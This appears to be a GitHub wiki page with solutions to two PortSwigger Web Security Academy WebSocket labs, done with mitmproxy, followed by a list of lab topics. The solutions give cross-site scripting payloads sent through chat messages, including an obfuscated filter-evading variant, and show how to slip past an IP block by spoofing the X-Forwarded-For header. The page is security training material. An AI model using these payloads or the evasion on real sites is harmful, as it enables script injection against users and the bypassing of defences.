-
Notifications
You must be signed in to change notification settings - Fork 0
WebSockets
Alnoman Kamil edited this page Oct 29, 2024
·
7 revisions
Apprentice lab:
Manipulating WebSocket messages to exploit vulnerabilities
Apprentice lab:
Manipulating WebSocket messages to exploit vulnerabilities
This online shop has a live chat feature implemented using WebSockets.
Chat messages that you submit are viewed by a support agent in real time.
To solve the lab, use a WebSocket message to trigger an alert()
popup in the support agent's browser.
-
Solution
- Go to Live chat and type a message. Before sending intercept the request.
- Edit websocket-message (
ef
), adding an onerror XSS{"message":"<img src=x onerror=alert(1)>"}
- Forward all requests (
A
).
Practitioner lab:
Manipulating the WebSocket handshake to exploit vulnerabilities
Practitioner lab:
Manipulating the WebSocket handshake to exploit vulnerabilities
-
Solution
- Go to live chat and try an XSS payload:
<img src=1 onerror='alert(1);'>
- System will detect attack. Trying
X-Forwarded-For: 234
works. - Set X-Forwarded-For header for everything request.
: set modify_headers /X-Forwarded-For/1234
- Trying out obfuscated XSS:
<img src=1 oNeRrOr=alert`1`;>
- Go to live chat and try an XSS payload:
Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite
Server-side topics:
- SQL injection
- Authentication
- File path traversal
- OS command injection
- Business logic vulnerabilities
- Information disclosure
- Access control vulnerabilities
- File upload vulnerabilities
- Race conditions
- Server-side request forgery (SSRF)
- XML external entity (XXE) injection
- NoSQL injection
- API testing
Client-side topics:
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Cross-origin resource sharing (CORS)
- Clickjacking
- DOM-based vulnerabilities
- WebSockets
Advanced topics: